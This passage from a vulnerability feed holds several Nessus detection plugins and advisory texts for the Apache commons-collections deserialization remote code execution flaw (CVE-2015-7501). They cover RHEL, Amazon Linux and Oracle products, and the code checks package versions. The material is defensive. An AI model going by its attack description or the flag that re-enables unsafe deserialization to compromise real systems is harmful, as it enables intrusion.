script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:mysql_enterprise_monitor\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mysql_enterprise_monitor_web_detect.nasl\");\n script_require_keys(\"installed_sw/MySQL Enterprise Monitor\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 18443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"install_func.inc\");\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp = \"MySQL Enterprise Monitor\";\nget_install_count(app_name:app, exit_if_zero:TRUE);\nport = get_http_port(default:18443);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nversion = install['version'];\ninstall_url = build_url(port:port, qs:\"/\");\n\nfix = \"3.1.6.7959\";\nvuln = FALSE;\nif (version =~ \"^3\\.1($|[^0-9])\" && ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n vuln = TRUE;;\n\nif (vuln)\n{\n report =\n '\\n URL : ' + install_url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url, version);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:30", "description": "It was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. 
A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library.", "cvss3": {}, "published": "2015-12-15T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : apache-commons-collections (ALAS-2015-618)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:apache-commons-collections", "p-cpe:/a:amazon:linux:apache-commons-collections-javadoc", "p-cpe:/a:amazon:linux:apache-commons-collections-testframework", "p-cpe:/a:amazon:linux:apache-commons-collections-testframework-javadoc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-618.NASL", "href": "https://www.tenable.com/plugins/nessus/87344", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-618.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87344);\n script_version(\"2.12\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"ALAS\", value:\"2015-618\");\n\n script_name(english:\"Amazon Linux AMI : apache-commons-collections (ALAS-2015-618)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. 
A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-618.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update apache-commons-collections' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:apache-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", 
\"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-3.2.1-11.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-javadoc-3.2.1-11.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-testframework-3.2.1-11.9.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"apache-commons-collections-testframework-javadoc-3.2.1-11.9.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"apache-commons-collections / apache-commons-collections-javadoc / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:45:52", "description": "Updated packages for the Apache commons-collections library for Red Hat JBoss Enterprise Application Platform 5.2, which fix one security issue, are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nRed Hat Product Security has rated this update as having Critical security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 5 is a platform for Java applications based on JBoss Application Server 6.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2 on Red Hat Enterprise Linux 4, 5, and 6 are advised to upgrade to these updated packages. The JBoss server process must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-12-04T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : JBoss EAP (RHSA-2015:2535)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2015-2535.NASL", "href": "https://www.tenable.com/plugins/nessus/87190", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2535. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87190);\n script_version(\"2.21\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2535\");\n\n script_name(english:\"RHEL 5 / 6 : JBoss EAP (RHSA-2015:2535)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated packages for the Apache commons-collections library for Red\nHat JBoss Enterprise Application Platform 5.2, which fix one security\nissue, are now available for Red Hat Enterprise Linux 4, 5, and 6.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nRed Hat JBoss Enterprise Application Platform 5 is a platform for Java\napplications based on JBoss Application Server 6.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of Red Hat JBoss Enterprise Application Platform 5.2 on Red\nHat Enterprise Linux 4, 5, and 6 are advised to upgrade to these\nupdated packages. 
The JBoss server process must be restarted for the\nupdate to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2535\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected jakarta-commons-collections and / or\njakarta-commons-collections-tomcat5 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", 
value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2535\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! 
(rpm_exists(release:\"RHEL5\", rpm:\"jbossas-welcome-content-eap\") || rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL5\", reference:\"jakarta-commons-collections-3.2.1-5.ep5.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-5.ep5.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-3.2.1-5.ep5.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-5.ep5.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jakarta-commons-collections / jakarta-commons-collections-tomcat5\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:38:48", "description": "The version of Oracle Application Testing Suite installed on the remote host is affected by a remote code execution vulnerability due to unsafe deserialize calls of unauthenticated Java objects to the Apache Commons Collections (ACC) library. 
An unauthenticated, remote attacker can exploit this, by sending a crafted SOAP request, to execute arbitrary code on the target host.", "cvss3": {}, "published": "2016-05-03T00:00:00", "type": "nessus", "title": "Oracle Application Testing Suite Java Object Deserialization RCE (April 2016 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:oracle:application_testing_suite"], "id": "ORACLE_OATS_CPU_APR_2016.NASL", "href": "https://www.tenable.com/plugins/nessus/90859", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90859);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_bugtraq_id(78215);\n script_xref(name:\"CERT\", value:\"576313\");\n\n script_name(english:\"Oracle Application Testing Suite Java Object Deserialization RCE (April 2016 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has a web application installed that is affected by a\nremote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Oracle Application Testing Suite installed on the\nremote host is affected by a remote code execution vulnerability due\nto unsafe deserialize calls of unauthenticated Java objects to the\nApache Commons Collections (ACC) library. 
An unauthenticated, remote\nattacker can exploit this, by sending a crafted SOAP request, to\nexecute arbitrary code on the target host.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuapr2016v3-2985753.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ffb7b96f\");\n # https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9c6d83db\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the April 2016 Oracle\nCritical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7501\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/04/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/05/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:application_testing_suite\");\n script_set_attribute(attribute:\"thorough_tests\", 
value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_application_testing_suite_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Application Testing Suite\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"install_func.inc\");\n\napp_name = \"Oracle Application Testing Suite\";\n\ninstall = get_single_install(app_name:app_name, exit_if_unknown_ver:TRUE);\nohome = install[\"Oracle Home\"];\nsubdir = install[\"path\"];\nversion = install[\"version\"];\n\nfix = NULL;\nfix_ver = NULL;\n\n# individual security patches\nif (version =~ \"^12\\.5\\.0\\.2\\.\")\n{\n fix_ver = \"12.5.0.2.605\";\n fix = \"23012288\";\n}\nelse if (version =~ \"^12\\.4\\.0\\.2\\.\")\n{\n fix_ver = \"12.4.0.2.250\";\n fix = \"23012275\";\n}\n\nif (!isnull(fix_ver) && ver_compare(ver:version, fix:fix_ver, strict:FALSE) == -1)\n{\n port = 0;\n if (report_verbosity > 0)\n {\n report =\n '\\n Oracle home : ' + ohome +\n '\\n Install path : ' + subdir +\n '\\n Version : ' + version +\n '\\n Required patch : ' + fix +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, app_name, version, subdir);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T15:44:38", "description": "Updated jakarta-commons-collections packages that fix one security issue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important security impact. 
A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new interfaces, implementations, and utilities to extend the features of the Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted code execution when deserializing objects involving a specially constructed chain of classes. A remote attacker could use this flaw to execute arbitrary code with the permissions of the application using the commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the commons-collections library is no longer allowed. Applications that require those classes to be deserialized can use the system property 'org.apache.commons.collections.enableUnsafeSerialization' to re-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to these updated packages, which contain a backported patch to correct this issue. 
All running applications using the commons-collections library must be restarted for the update to take effect.", "cvss3": {}, "published": "2015-11-30T00:00:00", "type": "nessus", "title": "RHEL 6 : jakarta-commons-collections (RHSA-2015:2521)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-7501"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc", "p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.7"], "id": "REDHAT-RHSA-2015-2521.NASL", "href": "https://www.tenable.com/plugins/nessus/87102", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:2521. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87102);\n script_version(\"2.19\");\n script_cvs_date(\"Date: 2019/10/24 15:35:40\");\n\n script_cve_id(\"CVE-2015-7501\");\n script_xref(name:\"RHSA\", value:\"2015:2521\");\n\n script_name(english:\"RHEL 6 : jakarta-commons-collections (RHSA-2015:2521)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated jakarta-commons-collections packages that fix one security\nissue are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. 
A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe Jakarta/Apache Commons Collections library provides new\ninterfaces, implementations, and utilities to extend the features of\nthe Java Collections Framework.\n\nIt was found that the Apache commons-collections library permitted\ncode execution when deserializing objects involving a specially\nconstructed chain of classes. A remote attacker could use this flaw to\nexecute arbitrary code with the permissions of the application using\nthe commons-collections library. (CVE-2015-7501)\n\nWith this update, deserialization of certain classes in the\ncommons-collections library is no longer allowed. Applications that\nrequire those classes to be deserialized can use the system property\n'org.apache.commons.collections.enableUnsafeSerialization' to\nre-enable their deserialization.\n\nFurther information about this security flaw may be found at:\nhttps://access.redhat.com/solutions/2045023\n\nAll users of jakarta-commons-collections are advised to upgrade to\nthese updated packages, which contain a backported patch to correct\nthis issue. 
All running applications using the commons-collections\nlibrary must be restarted for the update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/solutions/2045023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:2521\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7501\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-testframework-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jakarta-commons-collections-tomcat5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", 
value:\"cpe:/o:redhat:enterprise_linux:6.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:2521\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-javadoc-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-testframework-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-testframework-javadoc-3.2.1-3.5.el6_7\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"jakarta-commons-collections-tomcat5-3.2.1-3.5.el6_7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 